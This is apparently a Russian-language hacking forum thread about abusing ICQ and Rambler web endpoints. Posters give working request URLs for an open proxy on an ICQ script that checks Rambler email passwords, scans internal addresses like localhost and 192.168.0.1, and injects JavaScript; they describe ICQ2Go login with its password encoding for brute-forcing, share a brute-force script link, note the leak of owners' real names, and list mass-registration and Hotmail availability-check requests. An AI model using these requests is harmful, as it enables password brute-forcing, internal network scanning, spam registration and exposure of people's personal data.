К сути вопроса. PHP: http://id.rambler.ru/script/reg.cgi&[email protected]&password=521338 [php] так показывает ошибку 404 [php] https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&[email protected]&password=521338 Так запрос выполняется нормально. если выдаёт 1 то логин пасс верные если нет то 0. таким образом можно написать брутфорсер. Скрипт: PHP: https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url= является сам по себе вэб прокси сервером. Те переходя по ссылке https://ips.icq.com/ мы емеем 404. PHP: https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=https://ips.icq.com Всё ок.Нету форбиден. можно проскалитть локалку PHP: https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://192.168.0.1 и так далее. Можно приинклудить джава скрипт. PHP: https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=УРЛ_С_ДЖАВА_СКРИПТОМ Ccылка на исходьник скрипта. PHP: http://webfile.ru/1990419 Web-defence.ru
вот например красивий запрос PHP: https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://localhost недавно розберал авторизацию на icq2go то после просмотра старого и доброго webicq я нашел метод авторизацеи суть ево полягает в том что для начала мы берем сесию вот отсюда PHP: http://bhm.icq.com/hello?locale=en&clver=8003&clid=Wicked%5FTester&trans=1001&event=1500&%5F%5FiClient=%5Bobject%20Object%5D и получаем в ответ event=1510&session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&trans=1001&server=64%2e12%2e202%2e137&port=80&? 2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14- самая сесия 64.12.202.137 - адрес сервера и когда мы узнали нашу сесию делаем запрос PHP: http://64.12.202.137/data?session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&isicqemail=0&pass=DEDHFKDIHCFDGFHI&enc=1&status=0&sn=489801534&trans=1001&event=2000&%5F%5FiClient=%5Bobject%20Object%5D обратите внимания на пароль! пароль шифруеться, 1 символ заменяеться на 2 в файле char я привел почти все символи етой шифровкой ! если ответ мы получаем PHP: event=2010&session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae33557a14&trans=1001&skey=713969121&sn=489801534&epass=1EGEJGMEKIEGFHHIK&? значит пароль подошел PHP: event=2010 - означает что пароль удачный event=1000 - неправельный пароль
ChaaK мдяяяя а вот еси я айсику брутер хочу написать вот для таких как ты блин? что б проверялись парлли по HTTP
набрасал на скорую руку скрипт для брута мыльников, через первую багу, если кому надо берите http://dump.ru/file_catalog/417927
бага шЫкарная брут рамблер мыл с малым трафиком - штука крайне полезная НО есть еще 1 применение первому урлу(https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&[email protected]&password=521338 ) открываем в бровзере и видим введенные при регистрации мыльника фамилию и имя владельца рамблер-мыла я ввел в гугле mailto "@rambler." , проверил мыльники етим скриптом. Похоже, народ указывает в значительной части случаев реальные имя-фамилию
Возможность "Авто-рега" icq номеров. Code: http://icq.atlas.cz/ClientRegistration/default.aspx?connectorId=_icqFlashConnector&validateAtlasUser=1 пост даные PHP: uin=365286171&key=B800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797E5C5379824360CD653D1821270739CF55DFA9D094E9F8D&password=a8n5xz&data=%3Cdata%3E%3Cfname%3E%3C%2Ffname%3E%3Clname%3E%3C%2Flname%3E%3CbYear%3E0%3C%2FbYear%3E%3CbMonth%3E0%3C%2FbMonth%3E%3CbDay%3E0%3C%2FbDay%3E%3Cgender%3E0%3C%2Fgender%3E%3Ccountry%3E-1%3C%2Fcountry%3E%3Ccity%3E%3C%2Fcity%3E%3Cstate%3E%3C%2Fstate%3E%3Ckey%3EB800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797E5C5379824360CD653D1821270739CF55DFA9D094E9F8D%3C%2Fkey%3E%3Cuin%3E365286171%3C%2Fuin%3E%3Cpassword%3Ea8n5xz%3C%2Fpassword%3E%3Cemail%3E%3C%2Femail%3E%3Cnickname%3Exspider3%3C%2Fnickname%3E%3Cquestion%3EN%C3%A1zev+obl%C3%ADben%C3%A9+po%C4%8D%C3%ADta%C4%8Dov%C3%A9+hry%3F%3C%2Fquestion%3E%3Canswer%3Exspider+fghfgjhhg%3C%2Fanswer%3E%3CauthorizeAdd%3E%3C%2FauthorizeAdd%3E%3CauthorizeStatus%3E1%3C%2FauthorizeStatus%3E%3CrememberPass%3E1%3C%2FrememberPass%3E%3C%2Fdata%3E&username=<login> нотмаил.ком чек на свободные мыла Code: https://signup.live.com/nexus.fpp?cnmn=Microsoft.Msn.MemberExperience.Nexus.NexusService.CheckAvailability&ptid=0&a=f9869bdc-a627-4a1e-8c06-f0f1b88923cf PHP: [color=green]пост запрос[/color] cn=Microsoft.Msn.MemberExperience.Nexus.NexusService&mn=CheckAvailability&d=[%22<login>%40<domain>%22],%22f9869bdc-a627-4a1e-8c06-f0f1b88923cf%22&v=1 если ответ 1006 знач мыло свободное Web-Defence.ru
